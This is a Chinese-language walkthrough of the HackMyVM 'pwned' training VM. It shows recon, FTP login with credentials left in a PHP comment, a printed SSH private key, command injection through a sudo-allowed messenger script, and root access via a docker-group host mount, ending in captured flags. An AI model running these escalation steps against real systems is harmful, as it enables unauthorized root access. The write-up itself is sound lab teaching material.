HackMyVM-pwned靶场详解WP

信息收集

服务探测

这里发现开放了三个端口

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:9d:ee:5e       (Unknown)
192.168.56.121  08:00:27:36:b4:97       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.887 seconds (135.67 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.121
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:00 EDT
Nmap scan report for 192.168.56.121
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

那就从第一个ftp开始吧，发现并不支持匿名访问

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.3)
Name (192.168.56.121:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp>

尝试访问下web服务

然而当你curl会发现还有一段提示给你

<!-- I forgot to add this on last note
     You are pretty smart as i thought
     so here i left it for you
     She sings very well. l loved it  -->
#<!-- 我忘了在上一个便条中添加这个
你真的很聪明，正如我所想的那样
所以我把它留给你了
她唱得非常好。我喜欢 -->

扫下目录吧，说不定有意外收获

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.56.121 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,png,html,zip,bak


 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.121
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, png, html, zip, bak]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       16l       27w      194c http://192.168.56.121/nothing/nothing.html
200      GET       75l      191w     3065c http://192.168.56.121/
200      GET       75l      191w     3065c http://192.168.56.121/index.html
200      GET        4l        7w       41c http://192.168.56.121/robots.txt
[####################] - 3m     28380/28380   0s      found:4       errors:0
[####################] - 3m     28368/28368   176/s   http://192.168.56.121/
[####################] - 0s     28368/28368   1493053/s http://192.168.56.121/nothing/ => Directory listing
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.121/nothing/nothing.html
 <!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>

<h1>i said nothing bro</h1>
#<h1>我什么也没说，兄弟</h1>
<p></p>

<!--I said nothing here. you are wasting your time i don't lie-->
#<!--我在这里什么也没说。你在浪费时间，我不撒谎-->


</body>
</html>

发现有个nothing的目录，crul一下，hhhh确实nothing没东西，换了几个字典，由于我的kali扫的实在太慢，我直接看别人的WP了，发现有个hidden_text的一个目录，而且是301重定向

/nothing              (Status: 301) [Size: 312] [--> http://192.168.56.121/nothing/]
/server-status        (Status: 403) [Size: 276]                                   
/hidden_text          (Status: 301) [Size: 316] [--> http://192.168.56.121/hidden_text/]

有个secret.dic的文件，大概是目录的字典，使用wget下载下来，重新扫一下目录

┌──(kali㉿kali)-[~]
└─$ wget 192.168.56.121/hidden_text/secret.dic
--2024-10-15 03:49:31--  http://192.168.56.121/hidden_text/secret.dic
Connecting to 192.168.234.1:7891... connected.
Proxy request sent, awaiting response... 200 OK
Length: 211
Saving to: ‘secret.dic’

secret.dic                    100%[=================================================>]     211  --.-KB/s    in 0s

2024-10-15 03:49:31 (5.81 MB/s) - ‘secret.dic’ saved [211/211]
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.56.121 -w secret.dic -x txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.121
 🚀  Threads               │ 50
 📖  Wordlist              │ secret.dic
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       16l       27w      194c http://192.168.56.121/nothing/nothing.html
301      GET        9l       28w      321c http://192.168.56.121/pwned.vuln => http://192.168.56.121/pwned.vuln/
200      GET       75l      191w     3065c http://192.168.56.121/
[####################] - 1s        48/48      0s      found:3       errors:0
[####################] - 0s        22/22      282/s   http://192.168.56.121/
[####################] - 0s        22/22      2444/s  http://192.168.56.121/nothing/ => Directory listing
[####################] - 0s        22/22      314/s   http://192.168.56.121/pwned.vuln/

有个pwned.vuln的目录，进入是个登录的POST表单，哈哈，注释上写了账户密码，而且页面还给了tips

┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.121/pwned.vuln/
<!DOCTYPE html>
<html>
<head>
        <title>login</title>
</head>
<body>
                <div id="main">
                        <h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
                        ##你好，朋友。我也用先进的黑客方法入侵了你的登录页面。
                        <form method="POST">
                        Username <input type="text" name="username" class="text" autocomplete="off" required>
                        Password <input type="password" name="password" class="text" required>
                        <input type="submit" name="submit" id="sub">
                        </form>
                        </div>
</body>
</html>




<?php
//      if (isset($_POST['submit'])) {
//              $un=$_POST['username'];
//              $pw=$_POST['password'];
//
//      if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//              echo "welcome"
//              exit();
// }
// else
//      echo "Invalid creds"
// }
?>

但是当你使用这个登入，是无法进入其他页面的，很明显username是ftpuser，那联系上文ftp登录一下

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.3)
Name (192.168.56.121:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||57341|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||56034|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||55760|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |***************************************************************************|  2602       28.19 MiB/s    00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (1.89 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||55468|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***************************************************************************|    75      711.08 KiB/s    00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (65.74 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||61692|)
150 Here comes the directory listing.
drwxrwx---    4 1000     1000         4096 Jul 10  2020 ariana
drwxrwxrwx    3 0        0            4096 Jul 09  2020 ftpuser
-rwxr-xr-x    1 0        0             367 Jul 10  2020 messenger.sh
drwxrwx---    3 1001     0            4096 Jul 10  2020 selena
226 Directory send OK.
ftp> get messenger.sh
local: messenger.sh remote: messenger.sh
229 Entering Extended Passive Mode (|||32849|)
150 Opening BINARY mode data connection for messenger.sh (367 bytes).
100% |***************************************************************************|   367        3.97 MiB/s    00:00 ETA
226 Transfer complete.
367 bytes received in 00:00 (312.46 KiB/s)
ftp> exit
┌──(kali㉿kali)-[~]
└─$ cat messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

发现有个ftpuser用户有个share目录，里面有note和私钥，从/home上get了一个messenger.sh的脚本，先不管有没有用，get下来再说🤣

┌──(kali㉿kali)-[~/temp]
└─$ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(


┌──(kali㉿kali)-[~/temp]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

提示给了ariana用户不开心，那大概率是ariana的私钥

ariana用户提权

┌──(kali㉿kali)-[~/temp]
└─$ ssh [email protected] -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$
ariana@pwned:~$ ls
ariana-personal.diary  user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

果不其然，轻而易举就登上了

Sudo提权

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

发现可以使用selena用户执行messenger.sh脚本，这个脚本上面已经看过了，可以尝试命令劫持，当你直接使用sudo执行脚本，键入bash即可获得selena的bash

ariana@pwned:~$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : bash

Enter message for bash :bash

Sending message to bash
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena
/usr/bin/script -qc /bin/bash /dev/null ##升级交互式shell
selena@pwned:~$ ls
selena-personal.diary  user2.txt
selena@pwned:~$ cat user2.txt
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
#你离我很近。你也找到了塞琳娜。
#更努力地抓住我。

read -p “Enter username to send message : “ name
echo “”
read -p “Enter message for $name :” msg
echo “”
echo “Sending message to $name “

$msg 2> /dev/null

当执行bash 2>/dev/null时，这条命令会将所有标准错误输出转发到/dev/null，这样就会导致标准错误输出被丢弃掉，不会被显示在终端或重定向到文件中。换句话说，如果命令执行中有错误信息，由于错误信息会被重定向到空设备，用户是看不到这些错误信息的。

然而你使用id会发现有一个docker的用户组隶属于selena

同时你cat /etc/group也能找到

selena@pwned:~$ cat /etc/group
root:x:0:
daemon:x:1:
tty:x:5:
---------------中间省略了
ssh:x:113:
ariana:x:1000:
systemd-coredump:x:999:
ssl-cert:x:114:
selena:x:1001:
docker:x:115:selena #在这
ftp:x:116:
ftpuser:x:1002:

Root提权

Shell提权

这里尝试使用docker提权

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# pwd
/
# cd /root
# ls
root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c



You found me. i dont't expect this （◎ . ◎）

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker

Twitter    Ajs_walker
#

docker run是用来创建并运行一个容器的命令。参数-v /:/mnt表示将主机的根目录(/)挂载到容器内的/mnt目录下，这样容器就可以访问主机系统的文件。--rm参数表示容器在退出后将被删除。-it参数表示以交互模式运行容器，并分配一个终端。

接着是指定使用的镜像alpine，Alpine是一个轻量级的Linux发行版。然后是chroot /mnt sh，它的作用是将当前进程的根目录切换到指定的目录(/mnt)，这里指的是主机系统的根目录。最后启动一个shell，允许在容器内执行命令。

结束了，拿到flag了😎